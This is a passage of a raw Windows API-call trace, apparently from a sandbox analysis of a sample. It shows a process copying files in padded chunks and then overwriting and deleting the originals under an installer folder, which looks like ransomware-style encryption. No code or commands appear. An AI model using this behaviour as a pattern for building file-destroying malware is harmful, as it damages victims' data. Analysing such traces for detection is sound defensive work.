RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0071.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4f8 [0071.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8e440 [0071.683] GetLastError () returned 0x0 [0071.683] SetLastError (dwErrCode=0x0) [0071.683] GetLastError () returned 0x0 [0071.683] SetLastError (dwErrCode=0x0) [0071.683] GetLastError () returned 0x0 [0071.683] SetLastError (dwErrCode=0x0) [0071.683] GetLastError () returned 0x0 [0071.683] SetLastError (dwErrCode=0x0) [0071.683] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.683] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.684] GetLastError () returned 0x0 [0071.684] SetLastError (dwErrCode=0x0) [0071.685] GetLastError () returned 0x0 [0071.685] SetLastError (dwErrCode=0x0) [0071.685] GetLastError () returned 0x0 [0071.685] SetLastError (dwErrCode=0x0) [0071.685] GetLastError () returned 0x0 [0071.685] SetLastError (dwErrCode=0x0) [0071.685] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.685] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.685] GetLastError () returned 0x0 [0071.685] SetLastError (dwErrCode=0x0) [0071.685] GetLastError () returned 0x0 [0071.685] SetLastError (dwErrCode=0x0) [0071.686] GetLastError () returned 0x0 [0071.686] SetLastError (dwErrCode=0x0) [0071.686] GetLastError () returned 0x0 [0071.686] SetLastError (dwErrCode=0x0) [0071.686] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.686] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.686] GetLastError () returned 0x0 [0071.686] SetLastError (dwErrCode=0x0) [0071.686] GetLastError () returned 0x0 [0071.686] SetLastError (dwErrCode=0x0) [0071.686] GetLastError () returned 0x0 [0071.686] SetLastError (dwErrCode=0x0) [0071.687] GetLastError () returned 0x0 [0071.687] SetLastError (dwErrCode=0x0) [0071.687] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x558, lpOverlapped=0x0) returned 1 [0071.687] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.687] GetLastError () returned 0x0 [0071.687] SetLastError (dwErrCode=0x0) [0071.687] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0071.687] GetLastError () returned 0x0 [0071.687] SetLastError (dwErrCode=0x0) [0071.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0071.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d780 [0071.687] GetLastError () returned 0x0 [0071.687] SetLastError (dwErrCode=0x0) [0071.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4f8 | out: hHeap=0x20000) returned 1 [0071.688] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x560, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327ef70*=0x560, lpOverlapped=0x0) returned 1 [0071.688] GetLastError () returned 0x0 [0071.688] SetLastError (dwErrCode=0x0) [0071.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0071.688] GetLastError () returned 0x0 [0071.688] SetLastError (dwErrCode=0x0) [0071.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0071.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0071.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d780 | out: hHeap=0x20000) returned 1 [0071.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0071.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0071.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e440 | out: hHeap=0x20000) returned 1 [0071.688] CloseHandle (hObject=0x410) returned 1 [0071.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0071.690] CloseHandle (hObject=0x418) returned 1 [0071.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0071.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0071.691] AreFileApisANSI () returned 1 [0071.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0071.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x715b8 [0071.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 46 [0071.691] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0071.692] GetFileType (hFile=0x418) returned 0x1 [0071.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0071.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0071.692] GetLastError () returned 0xb7 [0071.692] SetLastError (dwErrCode=0xb7) [0071.692] WriteFile (in: hFile=0x418, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0071.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0071.693] CloseHandle (hObject=0x418) returned 1 [0071.693] AreFileApisANSI () returned 1 [0071.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0071.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71bd0 [0071.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x71bd0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 46 [0071.693] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll")) returned 1 [0071.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0071.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0071.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0071.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0071.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0071.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0071.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0071.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0071.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0071.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0071.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c288 | out: hHeap=0x20000) returned 1 [0071.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0071.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0071.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0071.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0071.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0071.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0071.695] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.695] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.695] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4f6, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x28bf8, dwReserved0=0x1, dwReserved1=0x0, cFileName="ĭ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧胐\x07̧비聐蚀\x08賂̧")) returned 0 [0071.695] FindClose (in: hFindFile=0x780d0 | out: hFindFile=0x780d0) returned 1 [0071.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0071.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0071.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0071.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0071.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0071.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0071.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0071.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0071.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46128 | out: hHeap=0x20000) returned 1 [0071.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0071.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0071.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0071.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0071.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0071.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0071.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0071.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0071.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0071.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0071.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0071.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0071.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0071.696] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.696] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.696] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.696] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0071.696] AreFileApisANSI () returned 1 [0071.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\2052", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\2052", lpUsedDefaultChar=0x0) returned 27 [0071.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.696] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.696] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0071.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0071.696] AreFileApisANSI () returned 1 [0071.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0071.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78010 [0071.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x78010, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2052") returned 27 [0071.696] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052" (normalized: "c:\\588bce7c90097ed212\\2052"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.696] GetLastError () returned 0x5 [0071.696] GetLastError () returned 0x5 [0071.697] SetLastError (dwErrCode=0x5) [0071.697] GetLastError () returned 0x5 [0071.697] SetLastError (dwErrCode=0x5) [0071.697] GetLastError () returned 0x5 [0071.697] SetLastError (dwErrCode=0x5) [0071.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78010 | out: hHeap=0x20000) returned 1 [0071.697] AreFileApisANSI () returned 1 [0071.697] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0071.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78310 [0071.697] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x78310, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2052") returned 27 [0071.697] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052" (normalized: "c:\\588bce7c90097ed212\\2052"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.697] GetLastError () returned 0x5 [0071.697] GetLastError () returned 0x5 [0071.697] SetLastError (dwErrCode=0x5) [0071.697] GetLastError () returned 0x5 [0071.697] SetLastError (dwErrCode=0x5) [0071.697] GetLastError () returned 0x5 [0071.697] SetLastError (dwErrCode=0x5) [0071.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78310 | out: hHeap=0x20000) returned 1 [0071.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0071.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0071.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.697] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.697] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.697] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.697] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0071.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0071.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0071.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0071.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0071.698] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="2070", cAlternateFileName="")) returned 1 [0071.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0071.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0071.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0071.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0071.698] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\2052\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78550 [0071.698] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.698] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x16c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0071.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0071.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0071.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0071.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0071.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0071.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0071.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0071.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0071.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0071.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46358 [0071.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0071.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0071.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0071.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0071.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0071.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0071.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0071.699] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0071.699] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0071.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0071.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0071.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0071.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71bd0 [0071.699] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0071.699] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0071.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0071.699] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0071.699] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.699] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.699] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.699] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.699] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0071.699] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0071.699] AreFileApisANSI () returned 1 [0071.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\2052\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\2052\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0071.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0071.699] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.699] InitOnceExecuteOnce (in: 